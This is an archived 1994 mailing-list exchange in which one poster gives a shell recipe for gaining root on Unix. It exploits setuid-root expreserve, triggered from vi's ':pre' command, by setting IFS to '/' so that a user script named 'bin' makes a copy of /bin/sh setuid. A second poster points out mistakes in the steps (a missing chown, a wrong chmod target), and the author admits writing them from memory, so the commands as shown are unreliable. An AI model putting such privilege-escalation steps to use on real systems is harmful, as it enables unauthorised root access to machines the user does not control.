On Sun, 16 Oct 1994, Chris Ellwood wrote:

> Charles Howes said...
> > ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
> > versions). Expreserve is setuid root. Expreserve runs /bin/mail
> > with 'system()'. So, do the following:
> > % cd /tmp
> > % cp /bin/sh fubar
> > % cat > bin
> > chmod 4755 fubar
> > ^D
> > % chmod u+x fubar
>
> I see a couple problems with the script so far. /bin/sh was copied
> to fubar while you are a regular user, so it will be owned by you
> and you'll end up with a nice copy of /bin/sh that's setuid to you,
> not your target user. Also, that last line should probably read
> 'chmod u+x bin', not fubar.

Ooops, forgot the chown. Sigh. Trust memory to lose things.

> > % setenv IFS=/
> > % vi
> > :pre
> > :q
> > % fubar
> > #
> > Some versions of expreserve don't have the hole.
> > Some versions of vi don't have the :pre command.
> > One does not imply the other.
>
> Thanks for posting it anyway.
>
> - Chris
>

--
Charles Howes -- chowes@helix.net
Always tell the truth, then you make it the other bloke's problem!
  - Sean Connery, 1971